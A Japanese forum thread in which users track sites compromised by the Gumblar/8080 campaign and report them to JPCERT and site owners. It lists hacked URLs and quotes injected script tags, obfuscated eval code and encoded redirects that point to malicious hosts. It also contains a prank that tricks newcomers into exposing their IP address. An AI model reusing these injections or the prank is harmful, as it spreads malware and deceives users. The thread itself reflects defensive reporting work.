あれはあれでクラッシュするサイトがあったりしてまだまだ不安定な代物なのに。

フラッシュプレイヤーとか競争相手が居ないからノンビリしてるんだろうなアドビ
のんびりし過ぎてユーザーから反感を買ってるのも知らずに・・・

HTML5だっけかに穴とか無ければそっちに移行してもらいたいもんだ

>>511
Vista以降のOSとIE8以降の組み合わせで使える保護モード使えよ
そうすりゃfirefoxより安全だろ

ChromeのWindows版や、IE8以降＋Vista以降は、ブラウザの主要部分を限定された権限で動かして、
ブラウザがセキュリティーホールでやられても影響が限定されるようになってる

firefoxは全部標準の権限で動いてるから、ブラウザがセキュリティーホールでやられるとまともに影響をうける

ここのアクセスしたらavastがトロイを発見しましたといいます
www●pacs●co.jp/pacs/hist_walk/walk_miyagi04/senwaka_saisyou_temp/
aguseとgredでチェックしても、安全としか出ないのですが
誤検出なんでしょうか？

>>521
どんなトロイ？

http://www●pacs●co●jp/pacs/hist_walk/walk_miyagi04/senwaka_saisyou_temp/pacs_pr/qqpr●php?d=sponser/&i=10&a=R&c=RV&w=550&h=50

ここに仕込まれてる

<script language=JavaScript>eval(unescape('var%20codelock_bas〜〜

火狐ﾏﾝｽｪーーーーー(棒)

home●e-catv●ne●jp/jun/

>>525
どこにあるの？

dotetin●sakura●ne●jp/
blaugrana●sakura●ne●jp/

>>523
難読化されてるけど
バナーの画像を入れ替えてるだけじゃないの？

mqpws428●sakura●ne●jp/index7●html

具体的には分かりませんが
らしき物が見受けられます
いかがでしょうか？

ここは鑑定スレじゃねぇよ

www●bestofunder●comが強烈でワロタww

アドビはなんでここまでやる気ないの
ソフトは穴だらけだわバージョン更新を餌にgetplusとか怪しげなもん植えつけようとするわ

>>531
http://megalodon.jp/2010-0321-0041-21/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.bestofunder.com%2Findex.html
再感染で.htaccess改竄？
http://www.dan.co.uk/viewsource/index.php?url=http://www●bestofunder●com/
xxxx.ruに飛ばされるから怪しいけど

ここにリンクあるから川島って人が管理してるサイトらしい
http://0000181856.seesaa.net/archives/200811-1.html

>>529
Index丸見えで、非公開のつもりのファイルが感染してます
image/sample/sample/index6.html
怪しげな情報商材も公開中です

最近のGumblarはスタートアップやタスマネのプロセスでも感染の有無が分からないのかねえ
>>3-6の対策、こまめな定義更新・ウイルススキャンを地道にしていくしかないか

>>535
お前のアンカーがヤバイ

>>353
氏ね

何考えてるんだ

×>>353
○>>535

馬鹿にしろ故意にしろ悪質

リンクからブラウザ起動しないように専ブラの設定変えとけば？

変なURLのやつはもちろん省くさ

> 使用していないものはアンインストール推奨です
>
> ■ Windows XPは可能ならば新しいOSに
> ■ Windows Update / Microsoft Updateを更新
> ・XP以下は念のためMicrosoft Updateに変更してアップデートする
> ■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
> ttp://get.adobe.com/jp/reader/
> ・インストール後本体をアップデート
> 　ヘルプ → アップデートの有無をチェック
> ・Acrobat Javascriptをオフにする
> 　編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
> ■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意！)
> ttp://get.adobe.com/jp/flashplayer/
> ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
> ・Flash Playerのバージョン確認
> ttp://www.adobe.com/jp/software/flash/about/
> ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
> ■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
> ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
> ■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
> ttp://www.java.com/ja/
> ・Javaのバージョン確認
> ttp://www.java.com/ja/download/installed.jsp
> ■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
> ttp://www.apple.com/jp/quicktime/download/
> ■ RealPlayerを更新 (使っていないならアンインストール)
> ttp://jp.real.com/?mode=basic

ここだけ重点にして

QuickTimeやRealPlayer無しで思う存分動画見られるプレイヤーがあればなあ

>>540
自分が踏んじゃうからこわーい＞＜
って言ってんじゃねえよ

>>541　お前の理解度なんかどうでもいい

スタートアップの製造元、コマンド、場所項目
タスマネプロセスの説明項目

このあたりに不明とか書いてたら怪しいと思っていいのかな

>>521
たぶん誤検知
いかにもな難読化コードなので誤判定されるのも無理ないけど

>>531,533
ちょっとまさぐってみたら
XXXXXXX●ru/skank/index●php?page=3d-anime-hentai-videos
３Ｄアニメ変態ビデヲｗｗｗｗｗ
※何が落ちてくるかは知らん

ちょっと追記
アクセスする毎に飛ばされる先が違う
thermalvisit●ru
awmmagazine●ru
visitthermal●ru

他にもあるかもしれん

>>546
Avira「HTML/Crypted.Gen」
Avast「JS:Redirector-CE [Trj] 」
Dr.Web「Trojan.MulDrop.1010」

535はうっかりクリックしたらどうすんだよｗ

【陥落サイトのURL悪用厳禁】
www●gal-love●com/
katusika●net/
d-pic●net/repo/ ←トップページ以外は相変わらず絶賛放置中
www●bbfactory●jp/
dental-mos●net/ap/14/4/
cre2cash●f01●jp/ ←<!--カス対応中ｗ-->
www●ad-jeaayf●com/links/
www12●plala●or●jp/atakashi/sk/
elyess●hotel-prony-elysees-paris●com/ao/5/3/index●html

なんかめっちゃ増えてるんですけどorz

【悪用厳禁】
http://www●marucen●co●jp/
http://www●haisui●com/
http://webright●jp/
http://kayak-nature●vaxponys●com/
JRCERTに報告しました

>>551
JPCERTに報告しました

http削り忘れた…

報告してくれるだけで十分ありがたい
次からは気をつけてね

Flash Player、Adobe Reader/Acrobatに新たな脆弱性、既に悪用も
http://internet.watch.impress.co.jp/docs/news/20100607_372679.html

マジかよ
動画サイト見るのも命がけの時代か

俺はずっと10.1RCを使ってたから
たまたま運良く被害をまぬがれていただけらしい

>>553 乙です
過去に陥落履歴があった(ような気がする)vaxponys●comを掘ってみた･･･

【陥落サイトのURL悪用厳禁】
best-shoper●vaxponys●com/
dream-girls●vaxponys●com/
diet-mates●vaxponys●com/
rocken-house●vaxponys●com/
german-house●vaxponys●com/
rice-premium123●vaxponys●com/
wine-house●vaxponys●com/
premium-farmer●vaxponys●com/
dyson-good●vaxponys●com/
kayak-house●vaxponys●com/
event-mate●vaxponys●com/
natural-warm●vaxponys●com/
rooms-sayaka●vaxponys●com/
祝！＼(^o^)／全滅

※他にもあるかも･･･

追記
■セーフ ブラウジング
vaxponys●com の診断ページ
www●google●com/safebrowsing/diagnostic?site=vaxponys●com/&hl=ja
>過去 90 日間に、このサイトの一部で不審な動きが 2 回報告されています。
>不正なソフトウェアは vaxponys●sakura●ne●jp/, supernewstuff●ru/ を含む 2 個のドメインでホストされています。

>vaxponys●sakura●ne●jp/
(;ﾟдﾟ)･･･

新型ってないの？
ここで報告されているのは殆どavast!で検出できるし

>>535のアンカーは何で危険なんだ?
専ブラでカーソルを合わせるだけなら問題ないのでは?

>>562
迷い込んだ初心者が信用して上から順に素直に何も疑わずクリックすることが想像される
住人の心配は全くしていない

>>561
Katesリバースエンジニアリングされて中身暴露されたからじゃない？

www.tu-han4.com/hatumo/

>>559
>>560
「vaxponys●sakura●ne●jp」をさくらに通報しました

>>561
取りこぼした検体を提出して検出率100％を目指すというのはどうか

>>565
>>368の時点でJRCERTに提出したんですけど、まだダメですか
もう一回通報しとこうかなあ…

このスレの存在自体危険だよな

>>567
罠リンクを罠リンクと見抜ける人間でないと（2chを使う事は）難しい

Silverlightってどうなの？
脆弱性報告されてたりする？

セキュリティ的にFlashよりいいのなら
ようつべも使えばいいのにと思うのだが

今はレジストリでしか感染確認出来ない？

>>567
このスレがあるから日本でのパンデミックが抑えられてるとも言える。
細々した陥落サイトを閉鎖・修正・消滅に追い込んでる人達に感謝しろよ。

>>570
最近出てるのは確認のしようがないらしい
駆除法もクリーンインストール（普通のウイルスやマルウェアならそこまで行きつかない最終手段）しかないって有様だしな
マスゴミや政府がザルなせいで被害は広がる一方

>>572
FTP以外のメール等のアカウントも抜かれるなら
迷惑メールがいっぱいくるのかな

確認のしようがないってことはavastでスキャンとかしてウイルスなしでも
感染してるかもしれないってことですか？

>>573
迷惑メールは受信だけでなく送信もありえる
それによってフリーメールアカウントなら停止させられるかもしれない

>>574
感染後にDLする何らかのウイルスを検出する可能性が高い
偽セキュリティソフトなんかがその典型

なんでこれだけ被害出てるのに、firefoxとかセキュリティーの低いブラウザ使い続けるのかわからん
IE8/9+Vista/7で保護モード使うか、ChromeのWindows版使うかすればいいのに

いまだにセキュリティー対策にIEからfirefoxにかえろとか大嘘おしえてGumblarとかに引っかかるユーザーを
量産してるアホはいますぐ腹を切るべし

XPなので保護モードありません＞＜
CPUがPenIIIなのでDEPもありません＞＜

>>573
アカウントと言えばYouTube、ニコ動のやつも何か利用されるのだろうか
著作物とかが勝手に違法アップロードされるとか

それよりもGumblar作ったやつをさっさと捕まえるなり殺害するなりしろよ
ここまでやっておいて死刑ですら生温いわ

firefoxで感染なんかしたことないな
script切ってない本人の問題
IEでないと見れないどこかのキムチ国ブラウザなんかいらないからw

テキストウラウザ最強だな

Windows捨てればええねん
LinuxやMacOSへGO！

どのブラウザなら大丈夫なんてないだろ常識的に考えて
それよりしっかりパッチ当てるなりサードパーティ製品のアップデートしろ

そういえばGumblarにたいしてHIPSは有効なのかね
ゼロディされたらこれが唯一の防御壁だろ

HIPSは有効だろうね
ドライブバイダウンロードやおかしな通信を防げる

ただし、最初に感染した時に何されたかはわからないけど

FirefoxにSnortライクなアドオンのFirekeeperがお手軽か
url_content, headers_content, body_contentやurl_re, headers_re, body_reで
拒否許可やアラートのルール作れるらしいから

最近のトレンドは、「やられても安心」っていう方向だからな
ところがfirefoxは設計が古臭く、やられにくいようにできるけど、やられたらダメっていうあいかわらずの旧タイプだな

IEやChromeは、やられても安心っていう方向に進化した

情報ダダ漏れのブラウザなんかいらない

ところが、実際にはFFが安全だったりするｗ
使ってれば判る事なんだが、アンチ糞は脳内だから知らないんだよ

>>588
（　ﾟДﾟ）ﾊｧ?
やられたら安全も糞もねぇ終わり。
どのブラウザも同じでしょ？
どのブラウザでもやられないようにすることが大事。
拾い食いして毒食べても平気な人間が居ないのと一緒。

↓この辺とか未対策だったらどうしようもないよね。
ttp://kb2.adobe.com/jp/cps/849/cpsid_84948.html

OSが窓ならなw

ごめんスレ違い

まぁFFと書く >>590 みたいなのは火狐厨の中でも
特別に低能な情弱なんだけどね

>>590
FFって馬鹿じゃねーの

保護モード下のIEやWindowsのChromeは、レンダリングは権限の低い別プロセスで行うから、
ブラウザがセキュリティーホールでやられたとしても、さらにOSのセキュリティーホールまで
やられない限り影響をうけない

もちろん、レンダリングと同じプロセスで動くプラグインにセキュリティーホールがあってやられたとしても同様

プロセスがやられたらおしまいな火狐とは違う

まあそういうのにこだわってる奴ほど引っかかるんだけどな…

あほか
普通に使ってればこだわり以前にFxだわ
悔し紛れに恥の上塗りかよ

FF君は引っかかりそうだなｗ

おまいらブラウザの話になるとすぐ沸騰するのなｗ

このスレ的には「>>4をやっておけばおｋ」なんだから
ブラウザがどうのこうのって話は他でやってくれ

取扱注意
berkeleyhouse●co●jp
英会話の前にパソコンインストールしなおしたほうが良いね

[adlib's Blog: 無料で始めるサイト改ざんチェックサービス「サイトミハル(SITEMIHARU)」を開始しました。]2010年2月8日月曜日　
■有料版：2万円（税別）/月
http://blog.adlibjapan.jp/2010/02/sitemiharu.html
これ誤判定でしょ？
http://blog.sitemiharu.com/?p=10031
http://blog.sitemiharu.com/?p=10021

san●ron5●com/gbc
またデジロックかぁ
通報しても落ちないんだろうな

>>601
「〜使ってる俺一番優秀、それ以外の奴はゴミ」って優越感に浸りたい奴の荒らし目的だから触る人がいる限りどうしようもないね
ここID出ないし、かといって初心者板にはガンブラー関連のスレないし
テンプレ偽造で踏ませるとか犯罪まがいも起こるしマジPC初心者には地獄

dear16●501●jp/deam13/
simple●703●jp/mens

そういえばこれどうなったの？

IEのあらゆるバージョンにローカル・ファイルへの不正アクセスを許す脆弱性
「設計上の基本特性に関わる問題であるため修正は難しい」との見解を示す
http://www.computerworld.jp/topics/move/173909.html

「〜使ってる俺一番優秀、それ以外の奴はゴミ」ってことは汚物Zでもわいたのか？
あれが居着くとアフォ発言が増えてスレが荒廃する。

>>606
以下にリダイレクトされるけどコードが確認できないね
suspended.503.jp/pc.php

>>602
メル凸したらarenaが動いてくれた様です
まだ一部感染していますが、ウイルスの駆除が始まりました

>>606
aguseで引っ掛けると「Pegel.aa」を検出、Gred及びDr.Webでは問題なし
ソースも問題ないですし、.jsなども存在せず…
リダイレクト先がphpとかそういう理由で検出してるとか？

>>606は運営会社が対処したんだと思う
megalodon.jp/2010-0608-1449-01/www.dan.co.uk/viewsource/index.php?url=http://webcache.googleusercontent.com/search?q=cache:8xe8YaFjQrUJ:dear16●501●jp/deam13/

取扱注意
www●nsc-com●co●jp
www●nagatan●co●jp

同じサーバ上で同じように改ざんされてるとは…。
コンテンツ管理者が同じなのか？

>>603
指定されたメールアドレスに結果が送信されるます。

日本語が不自由な・・・

【陥落サイトのURL悪用厳禁】
一件だけ投下･･
www●saiwai-estate●net ←なんか変ｗｗ

>>614
ページ中にこれを発見！！
reachsaw●ru:8080/meebo-com/google●com/monster●com●php
悪用禁止！！

>>601
その4の対策やっても、Flashの0-dayとかやられるじゃん
Flashの0-Day対策するには、別の方法使うしかない

＞メル凸したらarenaが動いてくれた様です
…と思ったら.jsひとつ修正して動きなしってどういうことなのorz
なんかダメっぽいのでJPCERTとIPAに通報しました

>>607
Secuniaを見る限りでは其処から進展してないっぽいです
Firefoxにも脆弱性が見つかってるみたいですし、どうしたものか

>>611
なるほど、そういうことでしたか
しかしaguseはここのところおかしな事続き

>>612
JPCERTに通報、反応待ち

>>614
メル凸済み、反応待ち

>>607
www.microsoft.com/technet/security/bulletin/ms10-035.mspx

取扱注意
www●enzou●jp

amyou●net/pet/　←デジロック
www●ad-jeaayf●com/links/　←デジロック

www●ktm-ktm●com/tomoko/

dida●mbsrv●jp

【陥落サイトのURL悪用厳禁】
www●ekinavi●sakura●ne●jp/diet/
www●kamituji1●com/
www●bbfactory●jp/ ←絶賛放置中(再掲載)
stromstein●fc2web●com/

取扱注意
yasubei●net

【陥落サイトのURL悪用厳禁】
seikon●nes3●com
www4●atpages●jp/kessan/

掘れば掘るほど出てくる･･orz

山形蕎麦と炙りの焔蔵様

感染の告知は無しでしょうか・・・
グーグルで検索しているお客様は逃げていきますョ

googleの対応は早くてありがたいな
まぁどんどんプログラムの亜種が出てるから「全部感知！」には至ってないけど……

>>626
なぜ？

>>628
キャッシュに改ざんの刻印がある
webcache●googleusercontent●com/search?q=cache:sWB9ZGzluRsJ:www.enzou●jp/

>>602がGREDの解析対象外になっとるｗｗｗ

って、あれ？
何を検索しても解析対象外になる…

何が起こってるんだ？

elyess●hotel-prony-elysees-paris●com/ao/5/3/

>>602の英会話スクール
ひっそり修正ですかね

【陥落サイトのURL悪用厳禁】
※8080じゃないやつ
www●alive-kanmoku●com/ansin●html
www●alive-kanmoku●com/bamen-310●html など･･･
www●acl-music●jp/ ←再掲載(改竄されすぎて絶賛崩壊中)
www●minatomo●jp/cart/CreProduct●php ←放置したまま逃げた？
iiji●biz/hirameki/
demchik●100free●com/3●html

あ、Gred直った
これでやっと凸先のチェックが出来る…さて頑張りますか

>>619-624
JPCERTに報告しました
「www●ekinavi●sakura●ne●jp/diet/」はnotfoundですか？

>>634
駆除が完了するまでに3回ほどメールで突っ込んでます
おかげさまでもう突っ込む気になれません


ところでさっきからPegel.bc仕込んだhtmlメールが何通も届いて…

www●og●sugiyama-u●ac●jp/itogiku/news/list●html

>>571
皆さんの善意は尊いですが
誰も見ない細々した陥落サイトが、このスレに報告され、
悪用され、被害拡大している可能性も否定できません

他のスレに張られた例↓
http://pc11.2ch.net/test/read.cgi/sec/1274675964/
http://hideyoshi.2ch.net/test/read.cgi/download/1273831452/484
http://hideyoshi.2ch.net/test/read.cgi/download/1270411236/705
http://live28.2ch.net/test/read.cgi/livemarket1/1275974928/47
http://live28.2ch.net/test/read.cgi/livemarket1/1275974928/81
http://pc12.2ch.net/test/read.cgi/win/1272505857/80
http://live28.2ch.net/test/read.cgi/news4vip/1275908414/48

前スレにもありましたが、継続的に悪用してる事例↓もありますし、良い知恵はないでしょうか
http://pc11.2ch.net/test/read.cgi/sec/1271787262/926

638荒らし

>>637
便所の落書きに貼ってあるURLを疑いもせず、いきなり踏むほうにも問題がある。

>>612
こっそり修正されていますね

長野鍛工株式会社
魚拓
http://megalodon.jp/2010-0608-2004-07/www.nagatan.co.jp/

中野スタンピング株式会社
魚拓
http://megalodon.jp/2010-0608-2000-49/www.nsc-com.co.jp/

>>638
2chに貼ってあるURLは安易に踏んじゃだめだよ

このスレの住人は、奇特なことに当事者や関係機関に通報までしている
当事者はそれを受けて実際に対応していっている
２ちゃんにしては、えらいまともなスレだと思う
>>638みたいなこと感じたこともない
それに>>638が言ってるのは2ちゃん内でのことでしかない
それに関しては>>640と言える
ウイルス貼るなんて特定の人間だから、自分の時間使って荒らし報告してアク禁に追い込めば？

意味不明

お前に意味不明

ここは"日本一巨大"な便所の落書きですから
勢いのあるスレでは、まとめサイト含めてページビューは万いきますよね
「安易に踏むのがダメ」で片付けるのはどうなんでしょう
サイト改竄がこれだけあるんですから、一般感染者は数百倍あるかも

前からノートントラップやブラクラスレのURLが悪用されてましたが
Gumblarは性質が悪いです

ここやブラクラスレで張られたURLを含む投稿を
自動的に受け付けないようにできればいいと思ったんですが

自分も時々感染サイトに報告してますし
このスレのみなさんを尊重してますので荒らしとか言わないで

>>647
ここはそういうとこじゃないでしょ
他の掲示板ならともかくURL安易に踏んじゃダメってのは2chの基本だよ

▽ 板違いと禁止の投稿
セキュリティ関係以外のソフトの話題は板違い。→ 【 Software板 】へ
Winny関連の話題は板違い。→ 【 Download板 】へ
不正アクセスの方法、パスワード・暗号解析など、攻撃方法の話題は禁止です。
荒らし依頼は全ての板で禁止です。
禁止内容の書き込みを発見したら【 削除依頼 】をお願いします。

>>644
検体拾って提出して、検出率アップにも貢献してるよ

２ちゃんで『リンク安易に踏んじゃダメ』ってのは全く正しいのですが
ここはネット初めて5日以内に辿り着くような巨大掲示板ですから
それを免罪符にするのはどうかと思いますよ

www.kdash.jpやHONDAが改竄されたように
セキュ意識なくても、大手のホームページ担当できるんですから
一般人が引っかかっても責められないです

このスレに感染URLを報告したら
後々責任を持って悪用されていないか調べて削除依頼するというのは
自分も面倒臭いと思います

●皆さんはこのスレに貼られた感染サイトが悪用されて
Gumblar被害の拡大につながっている可能性は"0"だとお思いですか？

スクリプトとかプログラムで自動的に悪用投稿されないような方法が
あると思ったのですが……

悪用してる連中に、その長ったらしい文章で説教して来い

>一般人が引っかかっても責められないです
仕事でやってようが趣味だろうが責められるべき

>>651
自己責任

あちこちに貼って回ってる馬鹿の自演だろ

>>651
↓　↓　↓　↓　↓　↓　↓　↓　↓
■使い方＆注意
http://info.2ch.net/guide/faq.html#B4
【タグ使用やリンクはできるの？】
>★ ワンポイント
>リンクの中には、ブラウザクラッシャ（ブラクラ）やＰＣクラッシャ（コンコン）やエログロ画像等、悪意をこめて貼り付けられたURLがあります。
>被害を未然に防止するためには、むやみにURLをクリックせず、以降の会話の流れやリンク先のソースをブラクラチェッカー等で確認してみてください。

しっかり書いてあるから>>640の通り。以上。

>>651
ネット初めて5日ならリカバリも楽じゃね
勉強代としては安い方かと

www●alive-kanmoku●com/ansin●html
www●alive-kanmoku●com/bamen-310●html
www●acl-music●jp
www●minatomo●jp/cart/CreProduct●php
iiji●biz/hirameki/
demchik●100free●com/3●html

以上JPCERTに報告済み、ねむい
「acl-music」は通報先にちょっと変わったところを混ぜてみました

Adobe Flash Player 10.1.53.64

getPlusのオマケつきだよ！

またgetplusか
まぁどうせコンパネで消すけど……

それにしても出現からもうすぐ一年経つのに「クリーンインストール」っていう最終手段しか感染した場合の対処法の無いヤツも珍しい
スレで報告されてるのが全部じゃないだろうし、いつになったら決着付くのかねぇ

IE版のFlashのオフラインインストーラー版がほしいときは、FirefoxでFlashダウンロードページにアクセスして
他のブラウザ用を選んでIEを選択すれば大丈夫
それだとgetplus不用でgoogleちゃんもついてないオフライン版をゲットできる

ただし、オフライン版は、更新がAdobe DLM版よりおそく、DLM版公開後1日〜数日後になったりする

Adobe Flash Player 10.1.53.64
http://fpdownload.adobe.com/get/flashplayer/current/install_flash_player.exe
http://fpdownload.adobe.com/get/flashplayer/current/install_flash_player_ax.exe
http://download.macromedia.com/pub/flashplayer/current/uninstall_flash_player.exe

直リン

取扱注意
www●maple-k●com

>>663
ttp://dreamweavermx2.biz/jp/support/flashplayer/ts/documents/tn_15507.htm
Player のバージョンが10.0.45.2なのと更新日:2010年2月12日というのはなんとかならんのかｗ

>>665
え？

この現状を見ると、デジタル証明書の存在が無意味じゃないか

>>663
　　　　　　　　 　 　 . ｨ
._ .......､._　　　 _　／:/l!
　:~""''.>ﾞ' "~　,､､''‐'､|　　　　　　　　　_　　　　
ﾞ､'､::::::ﾉ:::::::_,.-=.　 _〜:、 　 　 　 　 ／_.}'':,
　``､/:::::::::__....,._ `ﾞ'Y' _.ｪ-､....._　／_ﾞ''iﾞﾉ､ﾉ　　またまたご冗談を
　,.--l‐''"~..-_'.x-='"ﾞｰ ､`'-､　,:'　　ﾉﾞﾉﾌﾞ
"　　 .!-'",／　 `'-‐'') /＼　`/　てﾞノ-〈
　.-''~　>'ﾞ::　　　 ‐'"ﾞ./　　ヽ.,'　　 ~　／
　　 ／/:::::　　　　 　 ',　 　 /　　　 ,:'ﾞ　　　

( ﾟ,_ゝﾟ)ﾊﾞｶｼﾞｬﾈｰﾉ

>>668
またまたご冗談をｗ AA略

www●pasar-party●com

取扱注意
www●movecafe●com

>>664
>>671
メル凸済み、反応待ち

ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
あれ？

>>672
メル凸済み、反応待ち

例によってFlashは少し様子見るか…

OS再起動したらgetPlusだけ消えてる
どうなってんだ

>>672
Gred、Dr.Webともに反応せず
お手隙の方、精査よろしくです

>>672
確認できないけど

ttp://uproda.2ch-library.com/255513AD2/lib255513.jpg

変なエロサイトみて適当にクリックしてたら三分おきに↑の画像が表示されるようになったんだけど解決策ありませんか？　正直うっとおしいです・・・

「変な」とわかっていてなおかつリンク先を踏んだあなたが悪い

・・・じゃなくてスレ違い

こういう相談って
他人事みたいな口ぶりが多いよね

【陥落サイトのURL悪用厳禁】
www●hd-cre●com/bj-fh ←eval(base64_decode･･ なんだこれ？
※www●hd-cre●com/より下の階層はたぶん全滅

www●saiwai-estate●net ←再掲載(絶賛放置中)
blog●mensura-zoili●com/archives/2
seikon●nes3●com

凸してくれてる人＞乙です

ttp://www.ad-theater.com/unpaid.php?sw=0　
ちなみにサイトはココです

>>638
２ちゃんねる初心者ですか？
書き込む前にSG(セキュリティー・ガード)に登録しないと危険ですよ。
SGに登録せずに書き込んだ場合、
あなたのパソコンがGumblarに感染させられる恐れがあります。
初期の頃から２ちゃんねるにいる方達はかなりのスキルとこのBBSのコマンドを知っています
ですから簡単にあなたの個人情報等を抜かれ、Googleストリートビューで自宅まで公開された人も数多くおり
社会的に抹殺されてしまう。それが２ちゃんねるの隠れた素顔でもあります
SGしておけばまず実行される.ru:8080自体が無効になってしまうので
どんな凄腕ハッカーでもでも罠URLを踏ませる事ができなくなります


SGに登録する方法は、名前欄に「 fusianasan 」と入れる。


これでSGの登録は完了します
一度登録すれば、ブラウザを閉じない限り継続されます。
２ちゃんねるはルールさえ守れば危険な場所ではありません。
しかし悪意を持った人間も確かに存在します。気を付けて下さいね。

fusianasanは、正式にはフュージャネイザン、
又はフュジャネイザンと読みます。
元々はアメリカの学生達の間で、チャットの時に
セキュリティを強化する為に開発されたシステムです。
fusianasanを掲示板に組み込むのは結構面倒なのですが、
２ちゃんにカキコしてたらウィルスに感染したとか、
個人情報が漏れた等の抗議がうざったくなったひろゆきが、
仕方なく導入しました。
悪意のある人間にクラックされる前にSGを施す事をお勧めします。

>>683
user1.matsumoto.ne.jp/~goma/js/base64.html

>>685
そのIP暴露方法、まだ有効だったのかｗ

>>680>>684
いわゆるサイト改竄ではないのでスレチ
鑑定スレに行け

>>686
出先から電話だけで掘ってたからデコードできんかったorz

>>685
代行でGumblarリンク張る奴もいるからね
http://sports2.2ch.net/test/read.cgi/operatex/1274500251/366
http://anchorage.2ch.net/test/read.cgi/siberia/1274857287/410
http://yutori.2ch.net/test/read.cgi/morningcoffee/1273586556/744

Gumbla拡散に利用されて平気なの？

Flash Player更新したがNOSって名前のフォルダが出来てる・・・
コンパネで消した方がいい？

shabao●com/public_html/

>>684
ここ見たらいいんじゃね
http://wiki●higaitaisaku●com/wiki.cgi?page=%B0%AD%BC%C1%A5%EF%A5%F3%A5%AF%A5%EA%A5%C3%A5%AF%BA%BE%B5%BD%A5%B5%A5%A4%A5%C8%A4%CE%A5%B9%A5%D1%A5%A4%A5%A6%A5%A7%A5%A2

>>690
気にする必要ないと思われ

>>690
おれもそのファイルできてたけど
中に誰もいませんよ

http://www.macromedia.com/support/documentation/jp/flashplayer/help/settings_manager09.html
いつのまにFlashにP2P機能がついたんだよ

【感染が確認された大手企業一部】
・JR東日本 ・ホンダ ・ローソン ・京王電鉄 ・小林製薬 ・ハウス食品
・ラジオ関西 ・洋菓子販売のモロゾフ など多数

test

>>695
去年の9月くらいに気がついたんだけど
yimg.jpとかのFLASHでUPnPにアクセスしてたわ
今までは勝手にルーターのポート開放してたのか

これってFireFox のオプションの詳細、一般の中のアクセシビリティの
Web ページの自動転送、再読み込み禁止で警告させることは
出来ないのでしょうか

>>680
http://blog.trendmicro.co.jp/archives/2729

22 名前：（○口○*）さん 投稿日：10/06/12 15:43 ID:h5XAfxXp0
kazoeru■com

誤爆すんなｋｓｇ

ただでさえバグが多いFlash、いままではネットマーク周りはブラウザ依存だったからよかったものの、
P2P機能がついたりストリーミング機能ついたりして直接ネットワークアクセスなんてされたら、
どんなバグが潜んでるかかわからん

>>695
なにそれこわい…

>>701
http://www.virustotal.com/jp/analisis/613e307ea2d0993c75f4494e4061e520e2069d6aeee5834352d0ec9fc47c7c96-1276329681
AviraとKasperskyに検体を提出、返事待ち

>>702
しかも更新はせざるを得ない、しかし更新してもP2Pでポートに穴開けられる
どっちに進んでもPC詳しくない一般人には地獄だなコレ

>>695のパネルで「常に拒否」にしたんだけど、それでOK？今後も何かしないと
穴開けられる可能性あるのかな。

いっそflashplayerをアンインスコするのも手だと思うんだ
多少不便にはなるかもしれないがセキュリティにはかえられない

【陥落サイトのURL悪用厳禁】
www3●pf-x●net/~lau ←絶賛放置中
8080のコードがぶった斬られて
<script type="text/javascript" src="http〜中略〜.js"></script>
なんだこれ？

www●creativeholic●sakura●ne●jp/creativeholic/ ←web屋 カスがｗ
ここにも<script type="text/javascript" src="http〜中略〜.js"></script>

houritusoudan●net/
やっぱり<script type="text/javascript" src="http〜中略〜.js"></script>が入ってる

連投スマソ
【陥落サイトのURL悪用厳禁】
www●aoyamabc-online●com/
↓
</html>
<script type="text/javascript" src="http〜中略〜.js"></script>
<!--06f0d0ddde5fbe2387a6bdb4452f234a-->
8080がコードを変更した可能性あり。

【陥落サイトのURL悪用厳禁】
www●hekimen-ryokuka●com/rss/index●php ←今までのやつ

www●7500zei●com/ ←例のHP更新代行業者
↓
</html>
<script type="text/javascript" src="http〜中略〜.js"></script>
<!--d2392c04537c5eaf61fe86d1998535a1-->
katusika●net/base/
↓
<script type="text/javascript" src="http〜中略〜.js"></script>
<!--7e388d5d98d4fbb4bc9eb21bd27c9815-->

>>706
利便性と両立できないようなセキュリティ対策はゴミだよ。

llife●sakura●ne●jp/fubo/kyuusyuukonnkatu/

【陥落サイトのURL悪用厳禁】
新型8080(？)っぽいやつ
<script type="text/javascript" src="http〜中略〜.js"></script>
<!--32文字の英数字-->
↓
canyonhardware●com
d-pic●net/repo/index●html ←絶賛放置中のとこ

電話用のサイトだが･･･
no9-bbs●appspot●com/687474703A2F2F6770696E64792E636F6D2F30312F31392
コードがHEXされとるのがあった

>>710
動画サイト見ないやつはべつにいいだろ

>712
訂正
no9-bbs●appspot●com/687474703A2F2F6770696E64792E636F6D2F30312F31392F
末尾のFが脱落してたorz

>>713
コンテンツをフラッシュ内リンクでしか表示しないクソサイトも結構多いんだ。
見なくて済むなら即Ｕターンなんだが、施設の予約とかどうしようもなかったり、
特にウェザーニューズがな…。

>>715
アレのウザさは半端無いよね。
HTML版も作れや！って感じだよね

acl-musicのURLをGredで覗いて大爆笑ｗ
あそこは色々な意味で期待を裏切りません

いろいろ忙しくて報告が遅れちゃったので詳細は端折りますけど、
>>701-714までにあるURLは報告済みの反応待ち

これからチェックしようと思ったんですが、Gredがちょっとご機嫌斜め
うまくいかないもんですねえ…

>>717 乙乙
【陥落サイトのURL悪用厳禁】
tw13●net/vogue/S-MX/index●html ←相変わらず絶賛放置中
8080のコードが途中でぶった斬られて
↓
<script type="text/javascript" src="ｈttp：／／blog●bigsophieblog●com／OCR●js"></script>
<!--b8bc4160235ef97212335c7af60aeda7-->
houritusoudan●net/
↓
<script type="text/javascript" src="ｈttp:／／blog●bigsophieblog●com／Finder●js"></script>
<!--3edc66f8132dfa1d633ac8c343d2e74e-->
謎の新型の飛び先は
blog●bigsophieblog●com/〜.js
sogpaoiy●the-mlmpowercall●com/〜.js
この２つに集中してるみたい(現時点では)

お馴染みの激しい難読化されたやつ
shabao●com/public_html/top_footer ←既出だったかな？
www●saihu-shop●com/rss/index●php


あきた(から)ねる･･

ここの人たちって
どうやって感染サイト探してるの？
虱潰し？
とにかくすごいね

コードで検索

>>720
なるほど

